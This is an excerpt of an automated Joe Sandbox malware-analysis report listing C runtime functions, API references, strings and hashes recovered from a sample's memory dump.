                                                                                            • String ID:
                                                                                            • API String ID: 938513278-0
                                                                                            • Opcode ID: 5d2fdda8b2c337c15f5e45f0e314abe087f617901cd2a1ebb74c29d25e3ddec8
                                                                                            • Instruction ID: 600e316c4c0b515e5921c31e0b4557263661f3c2bedec43e289914c6551e9f3e
                                                                                            • Opcode Fuzzy Hash: 5d2fdda8b2c337c15f5e45f0e314abe087f617901cd2a1ebb74c29d25e3ddec8
                                                                                            • Instruction Fuzzy Hash: 7EF06232D05B10DAE620BB7A990675A27909F00728F11413FE4947B2D2CF7C49519B9E
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction ID: ddfa4d8130d636f3ef40e1cea94614215a6fa8e11de1469be39291c4408a14f6
                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction Fuzzy Hash: D111433204024ABBCF125E85CC05CEE3F23BF18355B598526FA1869571D73BC9B1BB86
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00403AA0), ref: 004067DD
                                                                                            • __malloc_crt.LIBCMT ref: 0040680C
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00406819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                            • String ID:
                                                                                            • API String ID: 237123855-0
                                                                                            • Opcode ID: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
                                                                                            • Instruction ID: c101f1b95c54b5ec221fdb71957a5b0ebd14c395316be2ddd09db82d21e96add
                                                                                            • Opcode Fuzzy Hash: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
                                                                                            • Instruction Fuzzy Hash: 2DF0E977501010AADB207735BC4985B1668DAD532830B843BF506E7284F9388D5182A9
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004020D5
                                                                                            • _memmove.LIBCMT ref: 00402126
                                                                                              • Part of subcall function 00402160: std::_Xinvalid_argument.LIBCPMT ref: 0040217A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                            • String ID: string too long
                                                                                            • API String ID: 2168136238-2556327735
                                                                                            • Opcode ID: b62e8e4e5b6e4aa08ba93a625368388b72582cc6314c21ca3f3c4be498d51de9
                                                                                            • Instruction ID: 68234aa450a1a40b984ca5c3b2ab52dbda57fca9de6b351a044f925e1d1c9fff
                                                                                            • Opcode Fuzzy Hash: b62e8e4e5b6e4aa08ba93a625368388b72582cc6314c21ca3f3c4be498d51de9
                                                                                            • Instruction Fuzzy Hash: 5E31D4323006105BD7249E5CEA8892BF7E9EB96724B20053FF681DB7D1C7F69C4083A8
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402266
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
                                                                                              • Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE
                                                                                            • _memmove.LIBCMT ref: 0040229F
                                                                                            Strings
                                                                                            • invalid string position, xrefs: 00402261
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: invalid string position
                                                                                            • API String ID: 1785806476-1799206989
                                                                                            • Opcode ID: a1952057a4e096b13f72e09b5b2883fd541ea52a40f1c6150da809b82a797c31
                                                                                            • Instruction ID: 666b8cab2f72e718ca0700166e1b69b788d832290e2be64dbb6745858c61b1b5
                                                                                            • Opcode Fuzzy Hash: a1952057a4e096b13f72e09b5b2883fd541ea52a40f1c6150da809b82a797c31
                                                                                            • Instruction Fuzzy Hash: 0601C8313006104BD7259DECEA8896AB3AAEB95714724497FD181DB7C1D6F5DC4283E8
                                                                                            APIs
                                                                                              • Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F14
                                                                                              • Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F24
                                                                                            • __getptd.LIBCMT ref: 00406F8A
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 00406F98
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
                                                                                            • Instruction ID: 50fe1fbb3cba8a88096214dfc38fae97991bbe41bdead42efad8af6b847898c5
                                                                                            • Opcode Fuzzy Hash: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
                                                                                            • Instruction Fuzzy Hash: CF014B358006068ADF349F25E4506AEB7B5AF10315F25443FE442763D2CF3999A4DF49
                                                                                            APIs
                                                                                            • DecodePointer.KERNEL32(?,004048A1,00000000,00000000,00000000,00000000,00000000,0040A0B4,?,004062E8,00000003,004040FC,00000001,00000000,00000000), ref: 00404873
                                                                                            • __invoke_watson.LIBCMT ref: 0040488F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: DecodePointer__invoke_watson
                                                                                            • String ID: PNv
                                                                                            • API String ID: 4034010525-4070351811
                                                                                            • Opcode ID: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
                                                                                            • Instruction ID: 3f05b26e2c2f593857254486353de4146da07769d251753da72b248ad5f130c6
                                                                                            • Opcode Fuzzy Hash: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
                                                                                            • Instruction Fuzzy Hash: F5E08CBA000149BBCF013FA2DC0996A3F2AFB80750B408834FE1490030D636C930DB98
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: DecodePointer
                                                                                            • String ID: PNv
                                                                                            • API String ID: 3527080286-4070351811
                                                                                            • Opcode ID: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
                                                                                            • Instruction ID: 6ffe08d2489e19cafbcafacff543f2e992a29dbeb95095b17cc4da8373e3439c
                                                                                            • Opcode Fuzzy Hash: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
                                                                                            • Instruction Fuzzy Hash: A9C04CB0B942106AFA103BF65C0B76966259F55B0AF048437BB06B81C2EEFD9624546F